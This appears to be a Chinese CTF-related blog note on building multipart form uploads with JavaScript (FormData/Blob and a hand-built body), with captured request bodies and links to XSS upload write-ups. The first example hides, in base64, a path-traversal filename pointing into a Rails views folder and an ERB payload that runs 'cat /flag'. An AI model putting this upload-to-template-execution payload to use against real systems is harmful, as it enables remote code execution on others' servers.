ajax上传表单的两种方式

1.用h5对象上传表单(图片)

    // Build a multipart/form-data request in the browser with the HTML5
    // FormData / Blob APIs and send it with XMLHttpRequest.
    // NOTE(review): every value in this request (field values, the part's
    // filename and its Content-Type) is chosen by the client, so the receiving
    // server has to treat all of them as untrusted input.
    const imageForm = new FormData();
    // File content as base64 text; it is sent exactly as written, not decoded here.
    const encodedContent = 'PCU9IGBjYXQgL2ZsYWcgYCAlPg==';
    // File name as base64 text. Decoded, it contains "../" segments, so a server
    // that decodes the name and joins it onto an upload directory must
    // canonicalise the result and reject anything outside that directory.
    const encodedName = "Ly4uLy4uL2FwcC92aWV3cy9ob21lL2FhMzguZXJi";
    // The part is labelled image/png although its bytes are base64 text: the
    // declared type proves nothing about the actual content.
    const imagePart = new Blob([encodedContent], { type: "image/png"});
    // Parts are appended in the order they appear in the request body.
    imageForm.append("authenticity_token", '1212121212');
    imageForm.append("file[context]", "zxcvxzcvxzcv");
    imageForm.append("file[myfile]", imagePart, encodedName);
    imageForm.append("commit", 'submit');
    // No Content-Type header is set by hand; the request body shown below
    // carries a browser-generated boundary.
    const imageUpload = new XMLHttpRequest();
    imageUpload.open("POST", "https://xz.aliyun.com/t/3245");
    imageUpload.send(imageForm);

请求体

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2
Content-Disposition: form-data; name="authenticity_token"

1212121212
------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2
Content-Disposition: form-data; name="file[context]"

zxcvxzcvxzcv
------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2
Content-Disposition: form-data; name="file[myfile]"; filename="Ly4uLy4uL2FwcC92aWV3cy9ob21lL2FhMzguZXJi"
Content-Type: image/png

PCU9IGBjYXQgL2ZsYWcgYCAlPg==
------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2
Content-Disposition: form-data; name="commit"

submit
------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2--

1.用h5对象上传表单(txt)

    // Same FormData approach, this time sending a plain-text file part.
    const textForm = new FormData();
    // File content: plain text, used as the Blob's bytes unchanged.
    const textContent = 'testestestes';
    // File name sent in the part's Content-Disposition header. It is supplied by
    // the client, so the server should not use it as a storage path as-is.
    const textName = "haha.txt";
    const textPart = new Blob([textContent], { type: "text/plain"});
    // Parts are appended in the order they appear in the request body.
    textForm.append("file[myfile]", textPart, textName);
    textForm.append("commit", 'submit');
    const textUpload = new XMLHttpRequest();
    textUpload.open("POST", "https://xz.aliyun.com/t/3245");
    textUpload.send(textForm);

请求体

------WebKitFormBoundaryFcFYtbPnXsiq8yjI
Content-Disposition: form-data; name="file[myfile]"; filename="haha.txt"
Content-Type: text/plain

testestestes
------WebKitFormBoundaryFcFYtbPnXsiq8yjI
Content-Disposition: form-data; name="commit"

submit
------WebKitFormBoundaryFcFYtbPnXsiq8yjI--

2.使用原生js上传表单数据

通过余弦这个网站辅助生成表单

/**
 * Shared request object, created once when the script loads.
 * Holds an XMLHttpRequest when the browser provides one, otherwise the legacy
 * 'Microsoft.XMLHTTP' ActiveX object, or `false` when neither can be created.
 */
xhr = (function () {
  // Modern browsers: native XMLHttpRequest.
  if (window.XMLHttpRequest) {
    return new XMLHttpRequest();
  }
  // No native object and no ActiveX support: nothing to create.
  if (!window.ActiveXObject) {
    return false;
  }
  try {
    return new window.ActiveXObject('Microsoft.XMLHTTP');
  } catch (ignored) {
    // Creation failed; callers receive `false`, as with no support at all.
    return false;
  }
})();

/**
 * Send one synchronous request through the shared `xhr` object.
 *
 * @param {string} method - HTTP method; the Content-Type header is set only for 'POST'.
 * @param {string} src - URL to request.
 * @param {*} argv - Request body handed to xhr.send().
 * @param {string} content_type - Content-Type header value used for POST requests.
 * @returns {string} xhr.responseText after the call to send() has returned.
 */
request = function (method, src, argv, content_type) {
  // The third argument `false` makes the call synchronous: send() blocks until
  // the response has arrived, so responseText can be read right after it.
  xhr.open(method, src, false);
  var needsContentType = (method == 'POST');
  if (needsContentType) {
    xhr.setRequestHeader('Content-Type', content_type);
  }
  xhr.send(argv);
  var responseBody = xhr.responseText;
  return responseBody;
};

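/**
 * Hand-build a multipart/form-data body with two plain fields
 * ("authenticity_token" and "file") and POST it through request().
 *
 * The string literals are written with explicit \r\n escapes and escaped inner
 * quotes: a double-quoted JavaScript string cannot contain a raw line break or
 * an unescaped double quote, and multipart bodies use CRLF line endings.
 *
 * NOTE(review): the token is just another request field here. A script running
 * inside the page's own origin can read and replay such a token, so a CSRF
 * token does not protect an application once script injection (XSS) is
 * possible; output encoding and a Content-Security-Policy remain necessary.
 *
 * Takes no parameters and returns nothing; the response text that request()
 * returns is discarded.
 */
attack_a = function () {
  var src = "https://xz.aliyun.com";
  var authenticity_token = "1212121212";
  var file = "zxcvxzcvxzcv";
  // Each delimiter line is "--" followed by the boundary declared in the
  // Content-Type header below; the final delimiter carries a trailing "--".
  var argv_0 = "\r\n";
  argv_0 += "---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"authenticity_token\"\r\n\r\n";
  argv_0 += (authenticity_token + "\r\n");
  // This part has no filename parameter, so it is an ordinary form field named
  // "file", not a file upload part.
  argv_0 += "---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n";
  argv_0 += (file + "\r\n");
  argv_0 += "---------------------7964f8dddeb95fc5--\r\n";
  // The boundary in the header must match the delimiters above, minus the
  // leading "--", or the server cannot split the body into parts.
  request("POST", src, argv_0, "multipart/form-data; boundary=-------------------7964f8dddeb95fc5");
};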

请求体:

---------------------7964f8dddeb95fc5
Content-Disposition: form-data; name="authenticity_token"

1212121212
---------------------7964f8dddeb95fc5
Content-Disposition: form-data; name="file"

zxcvxzcvxzcv
---------------------7964f8dddeb95fc5--

 HCTF share的详解ajax构造表单:

https://xz.aliyun.com/t/3258   xss上传表单

http://sec2hack.com/ctf/sctf2018-web-writeup.html xss获取源码

https://xz.aliyun.com/t/2469#toc-1   巅峰极客wp,xss获取图片

原文地址:https://www.cnblogs.com/afanti/p/9949593.html